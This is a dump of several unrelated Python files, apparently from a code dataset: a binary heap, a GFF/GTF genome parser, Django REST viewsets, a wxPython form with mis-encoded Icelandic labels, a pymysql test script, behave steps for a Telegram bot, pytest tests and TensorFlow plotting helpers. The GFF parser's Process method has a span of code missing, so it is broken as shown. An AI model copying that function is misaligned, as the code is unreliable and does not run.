return self.array[1]\n \n # Assumes that the two subtrees at left child and right child are max heaps\n def max_heapify(self, nodeIndex):\n leftNodeIndex = 2*nodeIndex\n rightNodeIndex = 2*nodeIndex+1\n leftNodeExists = self.checkNodeExists(leftNodeIndex)\n rightNodeExists = self.checkNodeExists(rightNodeIndex)\n if not leftNodeExists and not rightNodeExists:\n # No Children\n return\n swapped = False\n if leftNodeExists and not rightNodeExists:\n # Only left child\n swapped = self.swapChildIfGreater(leftNodeIndex, nodeIndex)\n if not leftNodeExists and rightNodeExists:\n # Only right child\n swapped = self.swapChildIfGreater(rightNodeIndex, nodeIndex)\n greaterChild = -1\n if leftNodeExists and rightNodeExists:\n # Both children, check which is greater\n if self.array[leftNodeIndex] > self.array[rightNodeIndex]: \n greaterChild = leftNodeIndex\n else:\n greaterChild = rightNodeIndex\n swapped = self.swapChildIfGreater(greaterChild, nodeIndex)\n if swapped is True: \n self.max_heapify(greaterChild) \n return\n \n def checkNodeExists(self, nodeIndex):\n if nodeIndex >= len(self.array): \n return False\n if self.array[nodeIndex] is None:\n return False\n return True\n \n def swapChildIfGreater(self, childNodeIndex, parentNodeIndex):\n if self.array[childNodeIndex] > self.array[parentNodeIndex]:\n temp = self.array[parentNodeIndex]\n self.array[parentNodeIndex] = self.array[childNodeIndex]\n self.array[childNodeIndex] = temp\n return True\n else:\n return False\n \n # Returns true if the binary tree is a max heap \n def checkMaxHeapProperty(self, nodeIndex):\n leftNodeIndex = 2*nodeIndex\n rightNodeIndex = 2*nodeIndex+1\n leftTreeChecked = True\n rightTreeChecked = True\n if leftNodeIndex < len(self.array) and self.array[leftNodeIndex] is not None:\n leftTreeChecked = self.checkMaxHeapProperty(leftNodeIndex)\n if rightNodeIndex < len(self.array) and self.array[rightNodeIndex] is not None:\n rightTreeChecked = self.checkMaxHeapProperty(rightNodeIndex)\n if rightTreeChecked and leftTreeChecked:\n return True\n else:\n return False \n ","sub_path":"Data_Structures/BinaryHeap/src/BinaryHeap.py","file_name":"BinaryHeap.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48003041","text":"\n\nclass GFFParser:\n def __init__(self):\n self.features=[]\n\n def GetParentFeature(self,feat):\n parentid=feat['parentid']\n if len(parentid)==0:\n return None\n key=feat['seqid']+parentid\n if not(key in self.featindex):\n return None\n idx=self.featindex[key]\n #print(idx)\n return self.features[idx]\n\n def parseGTF(self,filelist):\n #read the feature list\n self.features=[]\n self.featindex={}\n for filename in filelist:\n print('processing file '+filename)\n f=open(filename,'r')\n for line in f.readlines():\n# if len(self.features)>20000: break#!!!\n line=line.rstrip('\\n')\n if line[0]!='#':\n parts=line.split('\\t')\n feattype=parts[2]\n if (feattype=='CDS') or (feattype=='exon'):\n if len(self.features)%1000==0: print('read: '+str(len(self.features)))\n feat={}\n feat['nr']=len(self.features)\n feat['children']=[]\n feat['seqid']='chr'+parts[0]\n feat['type']=feattype\n feat['start']=int(parts[3])\n feat['end']=int(parts[4])\n attribs=parts[8].split(';')\n feat['id']=''\n feat['parentid']=''\n feat['name']=''\n for attribstr in attribs:\n attribstr=attribstr.lstrip()\n attribstr=attribstr.rstrip()\n # prt=attribstr.partition(' \"')\n key,sp,value=attribstr.partition(' \"')\n value=value[:-1]\n if feattype=='CDS':\n if key=='gene_id': feat['id']=value\n if key=='gene_name': feat['name']=value\n feat['type']='gene'\n else:\n if key=='gene_id': feat['parentid']=value\n self.features.append(feat)\n f.close()\n\n def parseGFF(self,filelist):\n #read the feature list\n self.features=[]\n for filename in filelist:\n print('processing file '+filename)\n f=open(filename,'r')\n header=f.readline().rstrip('\\n')\n if header!='##gff-version 3':\n raise Exception('Invalid GFF file')\n for line in f.readlines():\n line=line.rstrip('\\n')\n if line=='##FASTA':\n break\n if line[0]!='#':\n parts=line.split('\\t')\n feat={}\n feat['children']=[]\n feat['seqid']=parts[0]\n feat['type']=parts[2]\n feat['start']=int(parts[3])\n feat['end']=int(parts[4])\n attribs=parts[8].split(';')\n feat['id']=''\n feat['parentid']=''\n feat['name']=''\n for attribstr in attribs:\n if '=' in attribstr:\n key,value=attribstr.split('=')\n if key=='ID': feat['id']=value\n if key=='Parent': feat['parentid']=value\n if key=='Name': feat['name']=value\n self.features.append(feat)\n f.close()\n\n def Process(self):\n\n #remove duplicates\n print('removing duplicates')\n dind={}\n featnr=0\n while featnrfeat['start']:\n print('Left extending {0} from {1} to {2}'.format(parentfeat['id'],parentfeat['start'],feat['start']))\n parentfeat['start']=feat['start']\n\n\n\n #collect children of each feature\n for feat in self.features:\n myfeat=feat\n while self.GetParentFeature(myfeat)!=None:\n myparent=self.GetParentFeature(myfeat)\n myparent['children'].append(feat)\n myfeat=myparent\n myparent=self.GetParentFeature(feat)\n\n\n def save(self,filename):\n print('saving')\n f=open(filename,'w')\n for feat in self.features:\n if (feat['type']=='gene'):\n f.write(feat['seqid']+'\\t')\n f.write(str(feat['start'])+'\\t')\n f.write(str(feat['end'])+'\\t')\n f.write(feat['id']+'\\t')\n f.write(''+'\\t')\n f.write(feat['type']+'\\t')\n f.write(feat['name'])\n f.write('\\n')\n for child in feat['children']:\n if child['type']=='exon':\n f.write(child['seqid']+'\\t')\n f.write(str(child['start'])+'\\t')\n f.write(str(child['end'])+'\\t')\n f.write(child['id']+'\\t')\n f.write(feat['id']+'\\t')\n f.write(child['type']+'\\t')\n f.write(child['name'])\n f.write('\\n')\n f.close()\n\n\n\n#chromlist=range(1,15)\n#basepath=\"C:/Data/Genomes/Plasmodium\"\n#filelist=['{0}/Pf3D7_{1}.gff'.format(basepath,str(nr).zfill(2)) for nr in chromlist]\n#parser=GFFParser()\n#parser.parseGFF(filelist)\n#parser.Process()\n#parser.save('{0}/features.txt'.format(basepath))\n\n\nbasepath=\"C:/Data/Genomes/Human\"\nfilelist=['{0}/Homo_sapiens.GRCh37.68.gtf'.format(basepath)]\nparser=GFFParser()\nparser.parseGTF(filelist)\nparser.Process()\nparser.save('{0}/features.txt'.format(basepath))","sub_path":"Src/ConversionTools/ConvertGFF.py","file_name":"ConvertGFF.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400794502","text":"from rest_framework import viewsets\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.response import Response\nfrom rest_framework_extensions.mixins import PaginateByMaxMixin\nfrom django.http import JsonResponse\n\nfrom api.models import *\nfrom api.serializers import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\n\nclass GraphViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = GraphSerializer\n # authentication_classes = (TokenAuthentication,)\n # permission_classes = (IsAuthenticated,)\n queryset = GraphBase.objects.all()\n\n\nclass InstanceViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = InstanceSerializer\n # resource_name = False\n\n @detail_route(methods=['post'])\n def link(self, request, pk=None):\n graph_id = request.data.get('graph_id', None)\n source_id = request.data.get('source_id', None)\n target_id = request.data.get('target_id', None)\n link = ComponentLink.objects.filter(pk=pk).first()\n source = ComponentPort.objects.filter(uuid=source_id, instance__graph_id=graph_id).first()\n target = ComponentPort.objects.filter(uuid=target_id, instance__graph_id=graph_id).first()\n link.source = source\n link.target = target\n source_instance = ComponentInstance.objects.filter(id=source.instance_id).first()\n target_instance = ComponentInstance.objects.filter(id=target.instance_id).first()\n link_title = source_instance.title + target_instance.title\n link.title = link_title\n link.save()\n serializer = self.get_serializer(link, many=False)\n return Response(serializer.data)\n\n @detail_route(methods=['post'])\n def embed(self, request, pk=None):\n graph_id = request.data.get('graph_id', None)\n parent_id = request.data.get('parent_id', None)\n child = NestedComponent.objects.filter(pk=pk).first()\n child.parent = NestedComponent.objects.filter(uuid=parent_id, instance__graph_id=graph_id).first()\n child.save()\n serializer = self.get_serializer(child, many=False)\n return Response(serializer.data)\n\n @detail_route(methods=['post'], parser_classes=(JSONParser,))\n def ports(self, request, pk=None):\n\n new_ports = request.data.get('ports', [])\n instance = ComponentInstance.objects.filter(pk=pk).first()\n\n old_ports = list(ComponentPort.objects.filter(instance=instance).all())\n for port in old_ports:\n for new_port in new_ports:\n if port.uuid == new_port['id']:\n port.title = new_port['label']\n port.type = new_port['type']\n port.save()\n new_ports.remove(new_port)\n old_ports.remove(port)\n\n for port in old_ports:\n port.delete()\n\n for port in new_ports:\n ComponentPort.objects.create(uuid=port['id'], title=port['label'], type=port['type'], instance=instance)\n\n serializer = self.get_serializer(instance, many=False)\n return Response(serializer.data)\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = ComponentInstance.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = ComponentInstance.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = ComponentInstance.objects.filter()\n qs = InstanceSerializer(queryset)\n return queryset\n\n def perform_destroy(self, instance):\n target_links = ServiceLink.objects.filter(target_id=instance.id).all()\n for link in target_links:\n source = link.source\n source_links = ServiceLink.objects.filter(source_id=source.id).all()\n if source_links.count() <= 1:\n if source.id is not None:\n source.delete()\n instance.delete()\n\n def perform_create(self, serializer):\n graph = GraphBase.objects.filter(id=self.request.data['graph_id']).first()\n component = Component.objects.filter(id=self.request.data['component_id']).first()\n\n base_instance = component.get_base_instance()\n\n new_instance = serializer.save(graph=graph, component=component, properties=base_instance.properties,\n artifacts=base_instance.artifacts)\n new_instance.save()\n\n x_change = base_instance.last_x - new_instance.last_x\n y_change = base_instance.last_y - new_instance.last_y\n\n component.clone_instances_in_graph(graph, x_change, y_change, new_instance)\n\n\nclass PortViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = PortSerializer\n # authentication_classes = (TokenAuthentication,)\n # permission_classes = (IsAuthenticated,)\n # queryset = ComponentPort.objects.all()\n\n def get_queryset(self):\n port_id = self.request.query_params.get('port_id', None)\n instance_id = self.request.query_params.get('instance_id', None)\n if port_id is not None:\n queryset = ComponentPort.objects.filter(pk=port_id)\n elif instance_id is not None:\n queryset = ComponentPort.objects.filter(instance=instance_id)\n else:\n queryset = ComponentPort.objects.filter()\n return queryset\n\n def perform_create(self, serializer):\n instance = dict(self.request.data.get('instance', None))\n if 'id' in instance:\n port = serializer.save(instance_id=instance['id'])\n\n\nclass ServiceLinkViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = ServiceLinkSerializer\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = ServiceLink.objects.all()\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = ServiceLink.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = ServiceLink.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = ServiceLink.objects.filter(graph__user=self.request.user)\n return queryset\n\n def perform_create(self, serializer):\n graph = dict(self.request.data.get('graph', None))\n source = dict(self.request.data.get('source', None))\n target = dict(self.request.data.get('target', None))\n if 'id' in graph and 'id' in source and 'id' in target:\n serializer.save(graph_id=graph['id'], source_id=source['id'], target_id=target['id'])\n\n\nclass DependencyLinkViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = DependencyLinkSerializer\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = DependencyLink.objects.all()\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = DependencyLink.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = DependencyLink.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = DependencyLink.objects.filter(graph__user=self.request.user)\n return queryset\n\n def perform_create(self, serializer):\n graph = dict(self.request.data.get('graph', None))\n dependant = dict(self.request.data.get('dependant', None))\n dependency = dict(self.request.data.get('dependency', None))\n if 'id' in graph and 'id' in dependant and 'id' in dependency:\n serializer.save(graph_id=graph['id'], dependant_id=dependant['id'], dependency_id=dependency['id'])\n","sub_path":"api/views/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574317401","text":"# -*- coding: cp1252 -*-\nimport wx\n\nclass MainPage(wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n # sizers\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n grid = wx.GridBagSizer(hgap=5, vgap=5)\n hSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n # fyrirsögn\n self.fyrirsogn = wx.StaticText(self, label=\"Hvaš skal gera viš péningana?\")\n self.fyrirsognFont = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.NORMAL)\n self.fyrirsogn.SetFont(self.fyrirsognFont)\n mainSizer.Add(self.fyrirsogn)\n\n mainSizer.Add(grid, 0, wx.ALL, 5)\n\n # labels į lįn\n self.stadaLana = wx.StaticText(self, label=\"Staša lįns\") \n grid.Add(self.stadaLana, pos=(0,0))\n\n self.vextir = wx.StaticText(self, label=\"Vextir\")\n grid.Add(self.vextir, pos=(0,2))\n\n self.greidslubyrgdi = wx.StaticText(self, label=\"Greišslubyrgši\")\n grid.Add(self.greidslubyrgdi, pos=(0,4))\n\n self.verdtryggtLan = wx.StaticText(self, label=\"Verštryggt/óverštryggt\")\n grid.Add(self.verdtryggtLan, pos=(0,6))\n '''\n \"HARŠKÓŠAŠ\"\n # inputs og valmöguleikar fyrir lįn\n self.lan1 = wx.TextCtrl(self, size = (80,20))\n grid.Add(self.lan1, pos=(1,0))\n self.kr11 = wx.StaticText(self, label=\"kr.\")\n grid.Add(self.kr11, pos=(1,1))\n\n self.vextir1 = wx.TextCtrl(self, size = (50,20))\n grid.Add(self.vextir1, pos=(1,2))\n self.prosenta = wx.StaticText(self, label=\"%\")\n grid.Add(self.prosenta, pos=(1,3))\n\n self.greidslubyrgdi1 = wx.TextCtrl(self, size = (80,20))\n grid.Add(self.greidslubyrgdi1, pos=(1,4))\n self.kr12 = wx.StaticText(self, label=\"kr.\")\n grid.Add(self.kr12, pos=(1,5))\n \n radioList1 = ['Verštryggt', 'Óverštryggt']\n #self.radios1 = wx.RadioBox(self, choices=radioList1, majorDimension=3, style=wx.RA_SPECIFY_COLS)\n self.radios1 = wx.RadioBox(self, choices=radioList1)\n #grid.Add(self.radios1, pos=(1,3), span=(1,2))\n grid.Add(self.radios1, pos=(1,6))\n\n '''\n self.radioList = ['Verštryggt', 'Óverštryggt']\n \n # getum haft žetta grid \"interactive\" meš žessu\n self.fjoldiLana = 3\n \n for i in range(1, self.fjoldiLana+1):\n # innslįttur fyrir lįn - self.lani\n lan = 'lan' + str(i)\n setattr(self, lan, wx.TextCtrl(self, size = (80,20))) \n grid.Add(object.__getattribute__(self, lan), pos=(i,0))\n \n # kr. merki fyrir lįnsupphęš - self.kronai1\n krona1 = 'krona' + str(i) + '1'\n setattr(self, krona1, wx.StaticText(self, label='kr.'))\n grid.Add(object.__getattribute__(self, krona1), pos=(i,1))\n \n # innslįttur fyrir vexti - self.vextiri\n vextir = 'vextir' + str(i)\n setattr(self, vextir, wx.TextCtrl(self, size = (50,20)))\n grid.Add(object.__getattribute__(self, vextir), pos=(i,2))\n\n # prósentumerki - self.prosentai\n prosenta = 'prosenta' + str(i)\n setattr(self, prosenta, wx.StaticText(self, label='%'))\n grid.Add(object.__getattribute__(self, prosenta), pos=(i,3))\n\n # greišslubyrgši - self.greidslubyrgdii\n greidslubyrgdi = 'greidslubyrgdi' + str()\n setattr(self, greidslubyrgdi, wx.TextCtrl(self, size = (80,20)))\n grid.Add(object.__getattribute__(self, greidslubyrgdi), pos=(i,4))\n \n # kr. merki fyrir greišslubyrgši - self.kronai2\n krona2 = 'krona' + str(i) + '2'\n setattr(self, krona2, wx.StaticText(self, label='kr.'))\n grid.Add(object.__getattribute__(self, krona2), pos=(i,5))\n\n # radio buttons fyrir verštryggingu - self.verdtryggingi\n verdtrygging = 'verdtrygging' + str(i)\n setattr(self, verdtrygging, wx.RadioBox(self, choices=self.radioList))\n grid.Add(object.__getattribute__(self, verdtrygging), pos=(i,6))\n \n \n \n self.SetSizerAndFit(mainSizer)\n \n\napp = wx.App(False)\nframe = wx.Frame(None, title=\"Fyrsta śtgįfa\")\nframe.SetSize((600,500))\npanel = MainPage(frame)\nframe.Show()\napp.MainLoop()\n","sub_path":"main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11363285","text":"#!/usr/bin/env python\n\nimport pymysql \n\ndb=pymysql.connect('localhost','pi','1234','test')\ncur=db.cursor()\ncur.execute('select * from student')\nwhile True:\n\tstudent = cur.fetchone()\n\tif not student :\n\t\tbreak\n\tprint(student)\ncur.close()\ndb.close()\n","sub_path":"gpio/mysqltest.py","file_name":"mysqltest.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"565408560","text":"from behave import *\nfrom base.user_telegram import User\nfrom base.functions import check_message_by_list, get_random_month_day\nimport re\nimport datetime\n\n\n\"\"\"Steps in Spacebot\"\"\"\n\n#convert to int\ndef to_int(text):\n return int(text)\nregister_type(Number=to_int)\n\n#available roless in Spacebot\nrole_dict={\n 'user' : 'context.user',\n 'lvl1_1' : 'context.lvl1_1',\n 'lvl1_2' : 'context.lvl1_2',\n 'pr_1' : 'context.pr_1',\n 'pr_2' : 'context.pr_2',\n 'hr_1' : 'context.hr_1',\n 'hr_2' : 'context.hr_2',\n 'project' : 'context.project',\n 'cyprus' : 'context.cyprus',\n\n}\n\n@step(\"{role} click the button -{button}- quantity {number:Number}\")\ndef step_impl(context, role, button, number):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n client.click_button(button,mess_quant=number)\n\n@step(\"{role} click the button -{button}- in ticket_bot # {bot:Number} quantity {number:Number}\")\ndef step_impl(context, role, button, bot, number):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[bot])\n client.click_button(button,mess_quant=number)\n\n@step(\"{role} check data of tickets quantity {number:Number}\")\ndef step_impl(context, role, number):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n messages = client.get_messages(quantity_mess=number)\n for message in messages:\n if message.text.startswith(context.list_info_ticket[0]):\n assert check_message_by_list(message.text, context.list_info_ticket)\n\n@step(\"{role} check data of tickets in ticket_bot # {bot:Number}\")\ndef step_impl(context, role, bot):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[bot])\n messages = client.get_messages()\n for message in messages:\n if message.text.startswith('Тикет 👐 '+context.list_info_ticket[0][1:]):\n assert check_message_by_list(message.text, context.list_info_ticket[1:3])\n\n@step(\"{role} check message : -{message}- quantity {number:Number}\")\ndef step_impl(context, role, message, number):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n assert agent.check_message(message, mess_quant=number)\n\n@step(\"{role} check empty message : -{message}- quantity {number:Number}\")\ndef step_impl(context, role, message, number):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n assert agent.check_message(message, mess_quant=number) is False\n\n@step(\"{role} check message : -{message}- in bot # {bot:Number} quantity {number:Number}\")\ndef step_impl(context, role, message, bot, number):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[bot])\n assert agent.check_message(message, mess_quant=number)\n\n@step(\"{role} - empty button -{button}-\")\ndef step_impl(context, role, button):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n assert client.button_is_disappeared(button, mess_quant=3)\n\n@step(\"{role} - send message -{message}-\")\ndef step_impl(context,role, message):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n client.send_message(message)\n\n@step(\"{role} - add event to list_info_ticket: -{message}-\")\ndef step_impl(context, role, message):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n profile = client.get_profile_fl_name_username()\n # if 'Дата' in message:\n # 'Дата от: 2020-11-05 00:00:00'\n # context.list_info_ticket.append(message)\n if 'Коммент от' in message:\n result = re.search(r'(\\(.+\\))', profile)\n context.list_info_ticket.append('Коммент от '+result.group(0)[1:-1]+': comment')\n elif 'Тикет принял:' in message or 'Task closed:' in message:\n context.list_info_ticket.append(message+profile)\n else:\n context.list_info_ticket.append(message)\n\n@step(\"{role} - check photo or another media\")\ndef step_impl(context, role):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n messages = agent.get_messages(quantity_mess=3)\n if messages[0].media:\n assert True\n else:\n assert False\n\n@step(\"{role} - choose {variant} time interval\")\ndef step_impl(context, role, variant):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n current_data = datetime.date.today()\n\n if variant == 'correct':\n first_number = get_random_month_day()\n second_number = get_random_month_day(min_val=first_number)\n elif variant == 'incorrect':\n first_number = get_random_month_day()\n second_number = get_random_month_day(max_val=first_number-1)\n\n date_from = 'Дата от: {0}-{1}-{2} 00:00:00'.format(current_data.year, str(current_data.month).zfill(2),str(first_number).zfill(2))\n date_till = 'Дата до: {0}-{1}-{2} 00:00:00'.format(current_data.year, str(current_data.month).zfill(2),str(second_number).zfill(2))\n\n agent.click_button('^{}$'.format(first_number), mess_quant=2)\n assert agent.check_message(date_from, mess_quant=1)\n\n agent.click_button('^{}$'.format(second_number), mess_quant=2)\n assert agent.check_message(date_till, mess_quant=1)\n","sub_path":"features/steps/space_general.py","file_name":"space_general.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524837880","text":"import functools\n\nimport boto3\nimport pytest\nfrom click.testing import CliRunner\nfrom moto import mock_s3\n\nfrom mozetl.topline import topline_dashboard as topline\nfrom mozetl.topline.schema import historical_schema, topline_schema\n\ndefault_sample = {\n \"geo\": \"US\",\n \"channel\": \"nightly\",\n \"os\": \"Windows\",\n \"hours\": 1.0,\n \"crashes\": 1,\n \"google\": 1,\n \"bing\": 1,\n \"yahoo\": 1,\n \"other\": 1,\n \"actives\": 1,\n \"new_records\": 1,\n \"default\": 1,\n \"report_start\": \"20160101\",\n}\n\n\n@pytest.fixture()\ndef generate_data(dataframe_factory):\n return functools.partial(\n dataframe_factory.create_dataframe, base=default_sample, schema=topline_schema\n )\n\n\n@pytest.fixture()\ndef simple_df(generate_data):\n return generate_data(None)\n\n\n@pytest.fixture()\ndef multi_df(generate_data):\n snippets = [{\"geo\": \"CA\"}, {\"channel\": \"release\"}, {\"os\": \"Linux\"}]\n return generate_data(snippets)\n\n\n# reformatted data filters out ROW into Other\ndef test_reformat_filters_ROW(generate_data):\n # Maldives is not a target region\n input_df = generate_data([{\"geo\": \"MV\"}])\n df = topline.reformat_data(input_df)\n\n assert df.where(\"geo='MV'\").count() == 0\n assert df.where(\"geo='Other'\").count() > 0\n\n\ndef test_reformat_generates_rows_with_all(simple_df):\n \"\"\" The output of the dataset should contain 2^3 values. The\n cardinality of each dimension is 2 because of the additional `all`\n label.\"\"\"\n df = topline.reformat_data(simple_df)\n\n assert df.count() == 8\n\n\ndef test_reformat_prunes_empty_rows_with_all(multi_df):\n \"\"\" This test should generate 16 results where any of the rows\n contains `all` in any of the attribute fields. The cardinality of\n the cross product is 27. Don't include any rows that do not\n contain 'all'. Dont include rows that contain values of 0. This\n removes 2^3 results imediately, leaving 19 rows. We get rid of the\n extra three from the tuples containing only a single `all`.\n\n ('CA', 'release', 'all'),\n ('CA', 'all', 'Linux'),\n ('all', 'release','Linux')\n\n should not exist and contain empty rows. This leaves 16 results.\"\"\"\n df = topline.reformat_data(multi_df)\n\n # This row should be pruned\n assert df.where(\"geo='CA' AND channel='release'\").count() == 0\n\n # This should be the accurate count at the end\n assert df.where(\"geo='all' OR channel='all' OR os='all'\").count() == 16\n\n\n# reformatted data correctly aggregates all values\ndef test_reformat_aggregates(multi_df):\n df = topline.reformat_data(multi_df)\n\n rows = df.where(\"geo='all' AND channel='all' AND os='all'\").head()\n assert rows.hours == 3.0\n\n\ndef test_reformat_conforms_to_historical_schema(simple_df):\n df = topline.reformat_data(simple_df)\n\n assert df.columns == historical_schema.names\n\n\n@mock_s3\ndef test_cli_monthly(simple_df, tmpdir, monkeypatch):\n # set up moto with a fake bucket\n bucket = \"test-bucket\"\n prefix = \"test-prefix\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(Bucket=bucket)\n\n # change s3_path to use file:// protocol\n def mock_format_spark_path(bucket, prefix):\n return \"file://{}/{}\".format(bucket, prefix)\n\n monkeypatch.setattr(topline, \"format_spark_path\", mock_format_spark_path)\n\n # write test data to local path\n input_bucket = str(tmpdir)\n test_path = topline.format_spark_path(\n input_bucket, \"topline_summary/v1/mode=monthly\"\n )\n simple_df.write.partitionBy(\"report_start\").parquet(test_path)\n\n # Run the application via the cli\n runner = CliRunner()\n args = [\"monthly\", bucket, prefix, \"--input_bucket\", input_bucket]\n result = runner.invoke(topline.main, args)\n assert result.exit_code == 0\n\n # read results using boto\n body = (\n conn.Object(bucket, prefix + \"/topline-monthly.csv\")\n .get()[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n\n # header + 8x rows = 9\n assert len(body.rstrip().split(\"\\n\")) == 9\n","sub_path":"tests/test_topline_dashboard.py","file_name":"test_topline_dashboard.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"480182887","text":"# code refactored from Magnus Erik Hvass Pedersen tutorials\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport math\n\nclass Util(object):\n \n def plot_image(self, image, img_shape=(28,28)):\n plt.imshow(image.reshape(img_shape),\n interpolation='nearest',\n cmap='binary')\n\n plt.show()\n \n def plot_images(self, images, cls_true, cls_pred=None, img_size=28, img_shape=(28,28)):\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if cls_pred is None:\n xlabel = \"True: {0}\".format(cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(cls_true[i], cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_images_2(self, images, cls_true, class_names, cls_pred=None, smooth=True):\n assert len(images) == len(cls_true) == 9\n\n # Create figure with sub-plots.\n fig, axes = plt.subplots(3, 3)\n\n # Adjust vertical spacing if we need to print ensemble and best-net.\n if cls_pred is None:\n hspace = 0.3\n else:\n hspace = 0.6\n fig.subplots_adjust(hspace=hspace, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Interpolation type.\n if smooth:\n interpolation = 'spline16'\n else:\n interpolation = 'nearest'\n\n # Plot image.\n ax.imshow(images[i, :, :, :],\n interpolation=interpolation)\n\n # Name of the true class.\n cls_true_name = class_names[cls_true[i]]\n\n # Show true and predicted classes.\n if cls_pred is None:\n xlabel = \"True: {0}\".format(cls_true_name)\n else:\n # Name of the predicted class.\n cls_pred_name = class_names[cls_pred[i]]\n\n xlabel = \"True: {0}\\nPred: {1}\".format(cls_true_name, cls_pred_name)\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def print_test_accuracy(self, session, data, x, y_true, y_pred_cls, num_classes, \n show_example_errors=False,\n show_confusion_matrix=False):\n\n # Split the test-set into smaller batches of this size.\n test_batch_size = 256\n\n # Number of images in the test-set.\n num_test = len(data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {x: images,\n y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, 